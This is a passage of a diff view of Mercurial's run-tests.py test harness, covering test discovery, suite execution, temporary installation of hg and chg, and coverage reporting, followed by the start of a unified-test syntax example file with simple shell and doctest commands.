3144 elif 'HGTEST_SLOW' in os.environ:
3145 del os.environ['HGTEST_SLOW']
3145 del os.environ['HGTEST_SLOW']
3146
3146
3147 self._coveragefile = os.path.join(self._testdir, b'.coverage')
3147 self._coveragefile = os.path.join(self._testdir, b'.coverage')
3148
3148
3149 if self.options.exceptions:
3149 if self.options.exceptions:
3150 exceptionsdir = os.path.join(self._outputdir, b'exceptions')
3150 exceptionsdir = os.path.join(self._outputdir, b'exceptions')
3151 try:
3151 try:
3152 os.makedirs(exceptionsdir)
3152 os.makedirs(exceptionsdir)
3153 except OSError as e:
3153 except OSError as e:
3154 if e.errno != errno.EEXIST:
3154 if e.errno != errno.EEXIST:
3155 raise
3155 raise
3156
3156
3157 # Remove all existing exception reports.
3157 # Remove all existing exception reports.
3158 for f in os.listdir(exceptionsdir):
3158 for f in os.listdir(exceptionsdir):
3159 os.unlink(os.path.join(exceptionsdir, f))
3159 os.unlink(os.path.join(exceptionsdir, f))
3160
3160
3161 osenvironb[b'HGEXCEPTIONSDIR'] = exceptionsdir
3161 osenvironb[b'HGEXCEPTIONSDIR'] = exceptionsdir
3162 logexceptions = os.path.join(self._testdir, b'logexceptions.py')
3162 logexceptions = os.path.join(self._testdir, b'logexceptions.py')
3163 self.options.extra_config_opt.append(
3163 self.options.extra_config_opt.append(
3164 'extensions.logexceptions=%s' % logexceptions.decode('utf-8')
3164 'extensions.logexceptions=%s' % logexceptions.decode('utf-8')
3165 )
3165 )
3166
3166
3167 vlog("# Using TESTDIR", _bytes2sys(self._testdir))
3167 vlog("# Using TESTDIR", _bytes2sys(self._testdir))
3168 vlog("# Using RUNTESTDIR", _bytes2sys(osenvironb[b'RUNTESTDIR']))
3168 vlog("# Using RUNTESTDIR", _bytes2sys(osenvironb[b'RUNTESTDIR']))
3169 vlog("# Using HGTMP", _bytes2sys(self._hgtmp))
3169 vlog("# Using HGTMP", _bytes2sys(self._hgtmp))
3170 vlog("# Using PATH", os.environ["PATH"])
3170 vlog("# Using PATH", os.environ["PATH"])
3171 vlog(
3171 vlog(
3172 "# Using", _bytes2sys(IMPL_PATH), _bytes2sys(osenvironb[IMPL_PATH]),
3172 "# Using", _bytes2sys(IMPL_PATH), _bytes2sys(osenvironb[IMPL_PATH]),
3173 )
3173 )
3174 vlog("# Writing to directory", _bytes2sys(self._outputdir))
3174 vlog("# Writing to directory", _bytes2sys(self._outputdir))
3175
3175
3176 try:
3176 try:
3177 return self._runtests(testdescs) or 0
3177 return self._runtests(testdescs) or 0
3178 finally:
3178 finally:
3179 time.sleep(0.1)
3179 time.sleep(0.1)
3180 self._cleanup()
3180 self._cleanup()
3181
3181
3182 def findtests(self, args):
3182 def findtests(self, args):
3183 """Finds possible test files from arguments.
3183 """Finds possible test files from arguments.
3184
3184
3185 If you wish to inject custom tests into the test harness, this would
3185 If you wish to inject custom tests into the test harness, this would
3186 be a good function to monkeypatch or override in a derived class.
3186 be a good function to monkeypatch or override in a derived class.
3187 """
3187 """
3188 if not args:
3188 if not args:
3189 if self.options.changed:
3189 if self.options.changed:
3190 proc = Popen4(
3190 proc = Popen4(
3191 b'hg st --rev "%s" -man0 .'
3191 b'hg st --rev "%s" -man0 .'
3192 % _sys2bytes(self.options.changed),
3192 % _sys2bytes(self.options.changed),
3193 None,
3193 None,
3194 0,
3194 0,
3195 )
3195 )
3196 stdout, stderr = proc.communicate()
3196 stdout, stderr = proc.communicate()
3197 args = stdout.strip(b'\0').split(b'\0')
3197 args = stdout.strip(b'\0').split(b'\0')
3198 else:
3198 else:
3199 args = os.listdir(b'.')
3199 args = os.listdir(b'.')
3200
3200
3201 expanded_args = []
3201 expanded_args = []
3202 for arg in args:
3202 for arg in args:
3203 if os.path.isdir(arg):
3203 if os.path.isdir(arg):
3204 if not arg.endswith(b'/'):
3204 if not arg.endswith(b'/'):
3205 arg += b'/'
3205 arg += b'/'
3206 expanded_args.extend([arg + a for a in os.listdir(arg)])
3206 expanded_args.extend([arg + a for a in os.listdir(arg)])
3207 else:
3207 else:
3208 expanded_args.append(arg)
3208 expanded_args.append(arg)
3209 args = expanded_args
3209 args = expanded_args
3210
3210
3211 testcasepattern = re.compile(br'([\w-]+\.t|py)(?:#([a-zA-Z0-9_\-.#]+))')
3211 testcasepattern = re.compile(br'([\w-]+\.t|py)(?:#([a-zA-Z0-9_\-.#]+))')
3212 tests = []
3212 tests = []
3213 for t in args:
3213 for t in args:
3214 case = []
3214 case = []
3215
3215
3216 if not (
3216 if not (
3217 os.path.basename(t).startswith(b'test-')
3217 os.path.basename(t).startswith(b'test-')
3218 and (t.endswith(b'.py') or t.endswith(b'.t'))
3218 and (t.endswith(b'.py') or t.endswith(b'.t'))
3219 ):
3219 ):
3220
3220
3221 m = testcasepattern.match(os.path.basename(t))
3221 m = testcasepattern.match(os.path.basename(t))
3222 if m is not None:
3222 if m is not None:
3223 t_basename, casestr = m.groups()
3223 t_basename, casestr = m.groups()
3224 t = os.path.join(os.path.dirname(t), t_basename)
3224 t = os.path.join(os.path.dirname(t), t_basename)
3225 if casestr:
3225 if casestr:
3226 case = casestr.split(b'#')
3226 case = casestr.split(b'#')
3227 else:
3227 else:
3228 continue
3228 continue
3229
3229
3230 if t.endswith(b'.t'):
3230 if t.endswith(b'.t'):
3231 # .t file may contain multiple test cases
3231 # .t file may contain multiple test cases
3232 casedimensions = parsettestcases(t)
3232 casedimensions = parsettestcases(t)
3233 if casedimensions:
3233 if casedimensions:
3234 cases = []
3234 cases = []
3235
3235
3236 def addcases(case, casedimensions):
3236 def addcases(case, casedimensions):
3237 if not casedimensions:
3237 if not casedimensions:
3238 cases.append(case)
3238 cases.append(case)
3239 else:
3239 else:
3240 for c in casedimensions[0]:
3240 for c in casedimensions[0]:
3241 addcases(case + [c], casedimensions[1:])
3241 addcases(case + [c], casedimensions[1:])
3242
3242
3243 addcases([], casedimensions)
3243 addcases([], casedimensions)
3244 if case and case in cases:
3244 if case and case in cases:
3245 cases = [case]
3245 cases = [case]
3246 elif case:
3246 elif case:
3247 # Ignore invalid cases
3247 # Ignore invalid cases
3248 cases = []
3248 cases = []
3249 else:
3249 else:
3250 pass
3250 pass
3251 tests += [{'path': t, 'case': c} for c in sorted(cases)]
3251 tests += [{'path': t, 'case': c} for c in sorted(cases)]
3252 else:
3252 else:
3253 tests.append({'path': t})
3253 tests.append({'path': t})
3254 else:
3254 else:
3255 tests.append({'path': t})
3255 tests.append({'path': t})
3256 return tests
3256 return tests
3257
3257
    def _runtests(self, testdescs):
        """Run the tests described by *testdescs* and return 1 on failure.

        Handles --restart skipping, building the TestSuite, installing hg
        (and chg) when needed, and coverage output.  Returns None when
        everything passed, 1 otherwise.
        """

        def _reloadtest(test, i):
            # convert a test back to its description dict
            desc = {'path': test.path}
            case = getattr(test, '_case', [])
            if case:
                desc['case'] = case
            return self._gettest(desc, i)

        try:
            if self.options.restart:
                # Skip forward to the first test whose .err file exists,
                # i.e. the first previously-failed test.
                orig = list(testdescs)
                while testdescs:
                    desc = testdescs[0]
                    # desc['path'] is a relative path
                    if 'case' in desc:
                        casestr = b'#'.join(desc['case'])
                        errpath = b'%s#%s.err' % (desc['path'], casestr)
                    else:
                        errpath = b'%s.err' % desc['path']
                    errpath = os.path.join(self._outputdir, errpath)
                    if os.path.exists(errpath):
                        break
                    testdescs.pop(0)
                if not testdescs:
                    # No previous failure found: restart from scratch.
                    print("running all tests")
                    testdescs = orig

            tests = [self._gettest(d, i) for i, d in enumerate(testdescs)]
            num_tests = len(tests) * self.options.runs_per_test

            # Never spawn more workers than there are test runs.
            jobs = min(num_tests, self.options.jobs)

            failed = False
            kws = self.options.keywords
            if kws is not None and PYTHON3:
                kws = kws.encode('utf-8')

            suite = TestSuite(
                self._testdir,
                jobs=jobs,
                whitelist=self.options.whitelisted,
                blacklist=self.options.blacklist,
                retest=self.options.retest,
                keywords=kws,
                loop=self.options.loop,
                runs_per_test=self.options.runs_per_test,
                showchannels=self.options.showchannels,
                tests=tests,
                loadtest=_reloadtest,
            )
            # verbosity: 0 = listing only, 1 = normal, 2 = --verbose
            verbosity = 1
            if self.options.list_tests:
                verbosity = 0
            elif self.options.verbose:
                verbosity = 2
            runner = TextTestRunner(self, verbosity=verbosity)

            if self.options.list_tests:
                result = runner.listtests(suite)
            else:
                if self._installdir:
                    # Temporary install requested: build and sanity-check it.
                    self._installhg()
                    self._checkhglib("Testing")
                else:
                    self._usecorrectpython()
                if self.options.chg:
                    assert self._installdir
                    self._installchg()

                log(
                    'running %d tests using %d parallel processes'
                    % (num_tests, jobs)
                )

                result = runner.run(suite)

                if result.failures or result.errors:
                    failed = True

                result.onEnd()

                if self.options.anycoverage:
                    self._outputcoverage()
        except KeyboardInterrupt:
            failed = True
            print("\ninterrupted!")

        if failed:
            return 1
3348
3348
3349 def _getport(self, count):
3349 def _getport(self, count):
3350 port = self._ports.get(count) # do we have a cached entry?
3350 port = self._ports.get(count) # do we have a cached entry?
3351 if port is None:
3351 if port is None:
3352 portneeded = 3
3352 portneeded = 3
3353 # above 100 tries we just give up and let test reports failure
3353 # above 100 tries we just give up and let test reports failure
3354 for tries in xrange(100):
3354 for tries in xrange(100):
3355 allfree = True
3355 allfree = True
3356 port = self.options.port + self._portoffset
3356 port = self.options.port + self._portoffset
3357 for idx in xrange(portneeded):
3357 for idx in xrange(portneeded):
3358 if not checkportisavailable(port + idx):
3358 if not checkportisavailable(port + idx):
3359 allfree = False
3359 allfree = False
3360 break
3360 break
3361 self._portoffset += portneeded
3361 self._portoffset += portneeded
3362 if allfree:
3362 if allfree:
3363 break
3363 break
3364 self._ports[count] = port
3364 self._ports[count] = port
3365 return port
3365 return port
3366
3366
    def _gettest(self, testdesc, count):
        """Obtain a Test by looking at its filename.

        Returns a Test instance. The Test may not be runnable if it doesn't
        map to a known type.
        """
        path = testdesc['path']
        lctest = path.lower()
        # Default to the generic Test class unless the extension maps to a
        # more specific runner (e.g. .t / .py) via TESTTYPES.
        testcls = Test

        for ext, cls in self.TESTTYPES:
            if lctest.endswith(ext):
                testcls = cls
                break

        refpath = os.path.join(getcwdb(), path)
        # Each test slot gets its own scratch directory under HGTMP.
        tmpdir = os.path.join(self._hgtmp, b'child%d' % count)

        # extra keyword parameters. 'case' is used by .t tests
        kwds = {k: testdesc[k] for k in ['case'] if k in testdesc}

        t = testcls(
            refpath,
            self._outputdir,
            tmpdir,
            keeptmpdir=self.options.keep_tmpdir,
            debug=self.options.debug,
            first=self.options.first,
            timeout=self.options.timeout,
            startport=self._getport(count),
            extraconfigopts=self.options.extra_config_opt,
            shell=self.options.shell,
            hgcommand=self._hgcommand,
            usechg=bool(self.options.with_chg or self.options.chg),
            chgdebug=self.options.chg_debug,
            useipv6=useipv6,
            **kwds
        )
        # Mark the test as reloadable so the suite can rebuild it via
        # the loadtest callback between repeated runs.
        t.should_reload = True
        return t
3407
3407
3408 def _cleanup(self):
3408 def _cleanup(self):
3409 """Clean up state from this test invocation."""
3409 """Clean up state from this test invocation."""
3410 if self.options.keep_tmpdir:
3410 if self.options.keep_tmpdir:
3411 return
3411 return
3412
3412
3413 vlog("# Cleaning up HGTMP", _bytes2sys(self._hgtmp))
3413 vlog("# Cleaning up HGTMP", _bytes2sys(self._hgtmp))
3414 shutil.rmtree(self._hgtmp, True)
3414 shutil.rmtree(self._hgtmp, True)
3415 for f in self._createdfiles:
3415 for f in self._createdfiles:
3416 try:
3416 try:
3417 os.remove(f)
3417 os.remove(f)
3418 except OSError:
3418 except OSError:
3419 pass
3419 pass
3420
3420
    def _usecorrectpython(self):
        """Configure the environment to use the appropriate Python in tests."""
        # Tests must use the same interpreter as us or bad things will happen.
        pyexename = sys.platform == 'win32' and b'python.exe' or b'python'

        # os.symlink() is a thing with py3 on Windows, but it requires
        # Administrator rights.
        if getattr(os, 'symlink', None) and os.name != 'nt':
            vlog(
                "# Making python executable in test path a symlink to '%s'"
                % sysexecutable
            )
            mypython = os.path.join(self._tmpbindir, pyexename)
            try:
                # Reuse an existing correct symlink; replace a stale one.
                if os.readlink(mypython) == sysexecutable:
                    return
                os.unlink(mypython)
            except OSError as err:
                # ENOENT just means no symlink exists yet.
                if err.errno != errno.ENOENT:
                    raise
            if self._findprogram(pyexename) != sysexecutable:
                try:
                    os.symlink(sysexecutable, mypython)
                    self._createdfiles.append(mypython)
                except OSError as err:
                    # child processes may race, which is harmless
                    if err.errno != errno.EEXIST:
                        raise
        else:
            # No symlink support: make PATH resolve pyexename to our
            # interpreter's directory instead.
            exedir, exename = os.path.split(sysexecutable)
            vlog(
                "# Modifying search path to find %s as %s in '%s'"
                % (exename, pyexename, exedir)
            )
            path = os.environ['PATH'].split(os.pathsep)
            # Remove any duplicates before prepending, so exedir wins.
            while exedir in path:
                path.remove(exedir)
            os.environ['PATH'] = os.pathsep.join([exedir] + path)
            if not self._findprogram(pyexename):
                print("WARNING: Cannot find %s in search path" % pyexename)
3461
3461
    def _installhg(self):
        """Install hg into the test environment.

        This will also configure hg with the appropriate testing settings.

        Runs ``setup.py build install`` from the hg root, redirecting the
        build log to install.err, then patches up hg.bat on Windows and
        installs the coverage hooks when coverage was requested.  Exits the
        process (sys.exit(1)) if the install fails.
        """
        vlog("# Performing temporary installation of HG")
        installerrs = os.path.join(self._hgtmp, b"install.err")
        compiler = ''
        if self.options.compiler:
            compiler = '--compiler ' + self.options.compiler
        # Module-policy flag forwarded to setup.py (--pure / --rust /
        # --no-rust are mutually exclusive here by construction).
        setup_opts = b""
        if self.options.pure:
            setup_opts = b"--pure"
        elif self.options.rust:
            setup_opts = b"--rust"
        elif self.options.no_rust:
            setup_opts = b"--no-rust"

        # Run installer in hg root
        script = os.path.realpath(sys.argv[0])
        exe = sysexecutable
        if PYTHON3:
            compiler = _sys2bytes(compiler)
            script = _sys2bytes(script)
            exe = _sys2bytes(exe)
        hgroot = os.path.dirname(os.path.dirname(script))
        self._hgroot = hgroot
        os.chdir(hgroot)
        nohome = b'--home=""'
        if os.name == 'nt':
            # The --home="" trick works only on OS where os.sep == '/'
            # because of a distutils convert_path() fast-path. Avoid it at
            # least on Windows for now, deal with .pydistutils.cfg bugs
            # when they happen.
            nohome = b''
        cmd = (
            b'"%(exe)s" setup.py %(setup_opts)s clean --all'
            b' build %(compiler)s --build-base="%(base)s"'
            b' install --force --prefix="%(prefix)s"'
            b' --install-lib="%(libdir)s"'
            b' --install-scripts="%(bindir)s" %(nohome)s >%(logfile)s 2>&1'
            % {
                b'exe': exe,
                b'setup_opts': setup_opts,
                b'compiler': compiler,
                b'base': os.path.join(self._hgtmp, b"build"),
                b'prefix': self._installdir,
                b'libdir': self._pythondir,
                b'bindir': self._bindir,
                b'nohome': nohome,
                b'logfile': installerrs,
            }
        )

        # setuptools requires install directories to exist.
        def makedirs(p):
            try:
                os.makedirs(p)
            except OSError as e:
                if e.errno != errno.EEXIST:
                    raise

        makedirs(self._pythondir)
        makedirs(self._bindir)

        vlog("# Running", cmd.decode("utf-8"))
        if subprocess.call(_bytes2sys(cmd), shell=True) == 0:
            # Success: the log is only interesting in --verbose mode.
            if not self.options.verbose:
                try:
                    os.remove(installerrs)
                except OSError as e:
                    if e.errno != errno.ENOENT:
                        raise
        else:
            # Failure: replay the captured build log to stdout and abort.
            with open(installerrs, 'rb') as f:
                for line in f:
                    if PYTHON3:
                        sys.stdout.buffer.write(line)
                    else:
                        sys.stdout.write(line)
            sys.exit(1)
        os.chdir(self._testdir)

        self._usecorrectpython()

        hgbat = os.path.join(self._bindir, b'hg.bat')
        if os.path.isfile(hgbat):
            # hg.bat expects to be put in bin/scripts while run-tests.py
            # installation layout put it in bin/ directly. Fix it
            with open(hgbat, 'rb') as f:
                data = f.read()
            if br'"%~dp0..\python" "%~dp0hg" %*' in data:
                data = data.replace(
                    br'"%~dp0..\python" "%~dp0hg" %*',
                    b'"%~dp0python" "%~dp0hg" %*',
                )
                with open(hgbat, 'wb') as f:
                    f.write(data)
            else:
                print('WARNING: cannot fix hg.bat reference to python.exe')

        if self.options.anycoverage:
            # Install the sitecustomize.py trigger so every spawned Python
            # process starts coverage collection.
            custom = os.path.join(
                osenvironb[b'RUNTESTDIR'], b'sitecustomize.py'
            )
            target = os.path.join(self._pythondir, b'sitecustomize.py')
            vlog('# Installing coverage trigger to %s' % target)
            shutil.copyfile(custom, target)
            rc = os.path.join(self._testdir, b'.coveragerc')
            vlog('# Installing coverage rc to %s' % rc)
            osenvironb[b'COVERAGE_PROCESS_START'] = rc
            covdir = os.path.join(self._installdir, b'..', b'coverage')
            try:
                os.mkdir(covdir)
            except OSError as e:
                if e.errno != errno.EEXIST:
                    raise

            osenvironb[b'COVERAGE_DIR'] = covdir
3581
3581
3582 def _checkhglib(self, verb):
3582 def _checkhglib(self, verb):
3583 """Ensure that the 'mercurial' package imported by python is
3583 """Ensure that the 'mercurial' package imported by python is
3584 the one we expect it to be. If not, print a warning to stderr."""
3584 the one we expect it to be. If not, print a warning to stderr."""
3585 if (self._bindir == self._pythondir) and (
3585 if (self._bindir == self._pythondir) and (
3586 self._bindir != self._tmpbindir
3586 self._bindir != self._tmpbindir
3587 ):
3587 ):
3588 # The pythondir has been inferred from --with-hg flag.
3588 # The pythondir has been inferred from --with-hg flag.
3589 # We cannot expect anything sensible here.
3589 # We cannot expect anything sensible here.
3590 return
3590 return
3591 expecthg = os.path.join(self._pythondir, b'mercurial')
3591 expecthg = os.path.join(self._pythondir, b'mercurial')
3592 actualhg = self._gethgpath()
3592 actualhg = self._gethgpath()
3593 if os.path.abspath(actualhg) != os.path.abspath(expecthg):
3593 if os.path.abspath(actualhg) != os.path.abspath(expecthg):
3594 sys.stderr.write(
3594 sys.stderr.write(
3595 'warning: %s with unexpected mercurial lib: %s\n'
3595 'warning: %s with unexpected mercurial lib: %s\n'
3596 ' (expected %s)\n' % (verb, actualhg, expecthg)
3596 ' (expected %s)\n' % (verb, actualhg, expecthg)
3597 )
3597 )
3598
3598
3599 def _gethgpath(self):
3599 def _gethgpath(self):
3600 """Return the path to the mercurial package that is actually found by
3600 """Return the path to the mercurial package that is actually found by
3601 the current Python interpreter."""
3601 the current Python interpreter."""
3602 if self._hgpath is not None:
3602 if self._hgpath is not None:
3603 return self._hgpath
3603 return self._hgpath
3604
3604
3605 cmd = b'"%s" -c "import mercurial; print (mercurial.__path__[0])"'
3605 cmd = b'"%s" -c "import mercurial; print (mercurial.__path__[0])"'
3606 cmd = cmd % PYTHON
3606 cmd = cmd % PYTHON
3607 if PYTHON3:
3607 if PYTHON3:
3608 cmd = _bytes2sys(cmd)
3608 cmd = _bytes2sys(cmd)
3609
3609
3610 p = subprocess.Popen(cmd, stdout=subprocess.PIPE, shell=True)
3610 p = subprocess.Popen(cmd, stdout=subprocess.PIPE, shell=True)
3611 out, err = p.communicate()
3611 out, err = p.communicate()
3612
3612
3613 self._hgpath = out.strip()
3613 self._hgpath = out.strip()
3614
3614
3615 return self._hgpath
3615 return self._hgpath
3616
3616
3617 def _installchg(self):
3617 def _installchg(self):
3618 """Install chg into the test environment"""
3618 """Install chg into the test environment"""
3619 vlog('# Performing temporary installation of CHG')
3619 vlog('# Performing temporary installation of CHG')
3620 assert os.path.dirname(self._bindir) == self._installdir
3620 assert os.path.dirname(self._bindir) == self._installdir
3621 assert self._hgroot, 'must be called after _installhg()'
3621 assert self._hgroot, 'must be called after _installhg()'
3622 cmd = b'"%(make)s" clean install PREFIX="%(prefix)s"' % {
3622 cmd = b'"%(make)s" clean install PREFIX="%(prefix)s"' % {
3623 b'make': b'make', # TODO: switch by option or environment?
3623 b'make': b'make', # TODO: switch by option or environment?
3624 b'prefix': self._installdir,
3624 b'prefix': self._installdir,
3625 }
3625 }
3626 cwd = os.path.join(self._hgroot, b'contrib', b'chg')
3626 cwd = os.path.join(self._hgroot, b'contrib', b'chg')
3627 vlog("# Running", cmd)
3627 vlog("# Running", cmd)
3628 proc = subprocess.Popen(
3628 proc = subprocess.Popen(
3629 cmd,
3629 cmd,
3630 shell=True,
3630 shell=True,
3631 cwd=cwd,
3631 cwd=cwd,
3632 stdin=subprocess.PIPE,
3632 stdin=subprocess.PIPE,
3633 stdout=subprocess.PIPE,
3633 stdout=subprocess.PIPE,
3634 stderr=subprocess.STDOUT,
3634 stderr=subprocess.STDOUT,
3635 )
3635 )
3636 out, _err = proc.communicate()
3636 out, _err = proc.communicate()
3637 if proc.returncode != 0:
3637 if proc.returncode != 0:
3638 if PYTHON3:
3638 if PYTHON3:
3639 sys.stdout.buffer.write(out)
3639 sys.stdout.buffer.write(out)
3640 else:
3640 else:
3641 sys.stdout.write(out)
3641 sys.stdout.write(out)
3642 sys.exit(1)
3642 sys.exit(1)
3643
3643
3644 def _outputcoverage(self):
3644 def _outputcoverage(self):
3645 """Produce code coverage output."""
3645 """Produce code coverage output."""
3646 import coverage
3646 import coverage
3647
3647
3648 coverage = coverage.coverage
3648 coverage = coverage.coverage
3649
3649
3650 vlog('# Producing coverage report')
3650 vlog('# Producing coverage report')
3651 # chdir is the easiest way to get short, relative paths in the
3651 # chdir is the easiest way to get short, relative paths in the
3652 # output.
3652 # output.
3653 os.chdir(self._hgroot)
3653 os.chdir(self._hgroot)
3654 covdir = os.path.join(_bytes2sys(self._installdir), '..', 'coverage')
3654 covdir = os.path.join(_bytes2sys(self._installdir), '..', 'coverage')
3655 cov = coverage(data_file=os.path.join(covdir, 'cov'))
3655 cov = coverage(data_file=os.path.join(covdir, 'cov'))
3656
3656
3657 # Map install directory paths back to source directory.
3657 # Map install directory paths back to source directory.
3658 cov.config.paths['srcdir'] = ['.', _bytes2sys(self._pythondir)]
3658 cov.config.paths['srcdir'] = ['.', _bytes2sys(self._pythondir)]
3659
3659
3660 cov.combine()
3660 cov.combine()
3661
3661
3662 omit = [
3662 omit = [
3663 _bytes2sys(os.path.join(x, b'*'))
3663 _bytes2sys(os.path.join(x, b'*'))
3664 for x in [self._bindir, self._testdir]
3664 for x in [self._bindir, self._testdir]
3665 ]
3665 ]
3666 cov.report(ignore_errors=True, omit=omit)
3666 cov.report(ignore_errors=True, omit=omit)
3667
3667
3668 if self.options.htmlcov:
3668 if self.options.htmlcov:
3669 htmldir = os.path.join(_bytes2sys(self._outputdir), 'htmlcov')
3669 htmldir = os.path.join(_bytes2sys(self._outputdir), 'htmlcov')
3670 cov.html_report(directory=htmldir, omit=omit)
3670 cov.html_report(directory=htmldir, omit=omit)
3671 if self.options.annotate:
3671 if self.options.annotate:
3672 adir = os.path.join(_bytes2sys(self._outputdir), 'annotated')
3672 adir = os.path.join(_bytes2sys(self._outputdir), 'annotated')
3673 if not os.path.isdir(adir):
3673 if not os.path.isdir(adir):
3674 os.mkdir(adir)
3674 os.mkdir(adir)
3675 cov.annotate(directory=adir, omit=omit)
3675 cov.annotate(directory=adir, omit=omit)
3676
3676
3677 def _findprogram(self, program):
3677 def _findprogram(self, program):
3678 """Search PATH for a executable program"""
3678 """Search PATH for a executable program"""
3679 dpb = _sys2bytes(os.defpath)
3679 dpb = _sys2bytes(os.defpath)
3680 sepb = _sys2bytes(os.pathsep)
3680 sepb = _sys2bytes(os.pathsep)
3681 for p in osenvironb.get(b'PATH', dpb).split(sepb):
3681 for p in osenvironb.get(b'PATH', dpb).split(sepb):
3682 name = os.path.join(p, program)
3682 name = os.path.join(p, program)
3683 if os.name == 'nt' or os.access(name, os.X_OK):
3683 if os.name == 'nt' or os.access(name, os.X_OK):
3684 return name
3684 return name
3685 return None
3685 return None
3686
3686
3687 def _checktools(self):
3687 def _checktools(self):
3688 """Ensure tools required to run tests are present."""
3688 """Ensure tools required to run tests are present."""
3689 for p in self.REQUIREDTOOLS:
3689 for p in self.REQUIREDTOOLS:
3690 if os.name == 'nt' and not p.endswith(b'.exe'):
3690 if os.name == 'nt' and not p.endswith(b'.exe'):
3691 p += b'.exe'
3691 p += b'.exe'
3692 found = self._findprogram(p)
3692 found = self._findprogram(p)
3693 p = p.decode("utf-8")
3693 p = p.decode("utf-8")
3694 if found:
3694 if found:
3695 vlog("# Found prerequisite", p, "at", _bytes2sys(found))
3695 vlog("# Found prerequisite", p, "at", _bytes2sys(found))
3696 else:
3696 else:
3697 print("WARNING: Did not find prerequisite tool: %s " % p)
3697 print("WARNING: Did not find prerequisite tool: %s " % p)
3698
3698
3699
3699
3700 def aggregateexceptions(path):
3700 def aggregateexceptions(path):
3701 exceptioncounts = collections.Counter()
3701 exceptioncounts = collections.Counter()
3702 testsbyfailure = collections.defaultdict(set)
3702 testsbyfailure = collections.defaultdict(set)
3703 failuresbytest = collections.defaultdict(set)
3703 failuresbytest = collections.defaultdict(set)
3704
3704
3705 for f in os.listdir(path):
3705 for f in os.listdir(path):
3706 with open(os.path.join(path, f), 'rb') as fh:
3706 with open(os.path.join(path, f), 'rb') as fh:
3707 data = fh.read().split(b'\0')
3707 data = fh.read().split(b'\0')
3708 if len(data) != 5:
3708 if len(data) != 5:
3709 continue
3709 continue
3710
3710
3711 exc, mainframe, hgframe, hgline, testname = data
3711 exc, mainframe, hgframe, hgline, testname = data
3712 exc = exc.decode('utf-8')
3712 exc = exc.decode('utf-8')
3713 mainframe = mainframe.decode('utf-8')
3713 mainframe = mainframe.decode('utf-8')
3714 hgframe = hgframe.decode('utf-8')
3714 hgframe = hgframe.decode('utf-8')
3715 hgline = hgline.decode('utf-8')
3715 hgline = hgline.decode('utf-8')
3716 testname = testname.decode('utf-8')
3716 testname = testname.decode('utf-8')
3717
3717
3718 key = (hgframe, hgline, exc)
3718 key = (hgframe, hgline, exc)
3719 exceptioncounts[key] += 1
3719 exceptioncounts[key] += 1
3720 testsbyfailure[key].add(testname)
3720 testsbyfailure[key].add(testname)
3721 failuresbytest[testname].add(key)
3721 failuresbytest[testname].add(key)
3722
3722
3723 # Find test having fewest failures for each failure.
3723 # Find test having fewest failures for each failure.
3724 leastfailing = {}
3724 leastfailing = {}
3725 for key, tests in testsbyfailure.items():
3725 for key, tests in testsbyfailure.items():
3726 fewesttest = None
3726 fewesttest = None
3727 fewestcount = 99999999
3727 fewestcount = 99999999
3728 for test in sorted(tests):
3728 for test in sorted(tests):
3729 if len(failuresbytest[test]) < fewestcount:
3729 if len(failuresbytest[test]) < fewestcount:
3730 fewesttest = test
3730 fewesttest = test
3731 fewestcount = len(failuresbytest[test])
3731 fewestcount = len(failuresbytest[test])
3732
3732
3733 leastfailing[key] = (fewestcount, fewesttest)
3733 leastfailing[key] = (fewestcount, fewesttest)
3734
3734
3735 # Create a combined counter so we can sort by total occurrences and
3735 # Create a combined counter so we can sort by total occurrences and
3736 # impacted tests.
3736 # impacted tests.
3737 combined = {}
3737 combined = {}
3738 for key in exceptioncounts:
3738 for key in exceptioncounts:
3739 combined[key] = (
3739 combined[key] = (
3740 exceptioncounts[key],
3740 exceptioncounts[key],
3741 len(testsbyfailure[key]),
3741 len(testsbyfailure[key]),
3742 leastfailing[key][0],
3742 leastfailing[key][0],
3743 leastfailing[key][1],
3743 leastfailing[key][1],
3744 )
3744 )
3745
3745
3746 return {
3746 return {
3747 'exceptioncounts': exceptioncounts,
3747 'exceptioncounts': exceptioncounts,
3748 'total': sum(exceptioncounts.values()),
3748 'total': sum(exceptioncounts.values()),
3749 'combined': combined,
3749 'combined': combined,
3750 'leastfailing': leastfailing,
3750 'leastfailing': leastfailing,
3751 'byfailure': testsbyfailure,
3751 'byfailure': testsbyfailure,
3752 'bytest': failuresbytest,
3752 'bytest': failuresbytest,
3753 }
3753 }
3754
3754
3755
3755
3756 if __name__ == '__main__':
3756 if __name__ == '__main__':
3757 runner = TestRunner()
3757 runner = TestRunner()
3758
3758
3759 try:
3759 try:
3760 import msvcrt
3760 import msvcrt
3761
3761
3762 msvcrt.setmode(sys.stdin.fileno(), os.O_BINARY)
3762 msvcrt.setmode(sys.stdin.fileno(), os.O_BINARY)
3763 msvcrt.setmode(sys.stdout.fileno(), os.O_BINARY)
3763 msvcrt.setmode(sys.stdout.fileno(), os.O_BINARY)
3764 msvcrt.setmode(sys.stderr.fileno(), os.O_BINARY)
3764 msvcrt.setmode(sys.stderr.fileno(), os.O_BINARY)
3765 except ImportError:
3765 except ImportError:
3766 pass
3766 pass
3767
3767
3768 sys.exit(runner.run(sys.argv[1:]))
3768 sys.exit(runner.run(sys.argv[1:]))
@@ -1,134 +1,144 b''
1 Test that the syntax of "unified tests" is properly processed
1 Test that the syntax of "unified tests" is properly processed
2 ==============================================================
2 ==============================================================
3
3
4 Simple commands:
4 Simple commands:
5
5
6 $ echo foo
6 $ echo foo
7 foo
7 foo
8 $ printf 'oh no'
8 $ printf 'oh no'
9 oh no (no-eol)
9 oh no (no-eol)
10 $ printf 'bar\nbaz\n' | cat
10 $ printf 'bar\nbaz\n' | cat
11 bar
11 bar
12 baz
12 baz
13
13
14 Multi-line command:
14 Multi-line command:
15
15
16 $ foo() {
16 $ foo() {
17 > echo bar
17 > echo bar
18 > }
18 > }
19 $ foo
19 $ foo
20 bar
20 bar
21
21
22 Return codes before inline python:
22 Return codes before inline python:
23
23
24 $ sh -c 'exit 1'
24 $ sh -c 'exit 1'
25 [1]
25 [1]
26
26
27 Doctest commands:
27 Doctest commands:
28
28
29 >>> from __future__ import print_function
29 >>> from __future__ import print_function
30 >>> print('foo')
30 >>> print('foo')
31 foo
31 foo
32 $ echo interleaved
32 $ echo interleaved
33 interleaved
33 interleaved
34 >>> for c in 'xyz':
34 >>> for c in 'xyz':
35 ... print(c)
35 ... print(c)
36 x
36 x
37 y
37 y
38 z
38 z
39 >>> print()
39 >>> print()
40
40
41 >>> foo = 'global name'
41 >>> foo = 'global name'
42 >>> def func():
42 >>> def func():
43 ... print(foo, 'should be visible in func()')
43 ... print(foo, 'should be visible in func()')
44 >>> func()
44 >>> func()
45 global name should be visible in func()
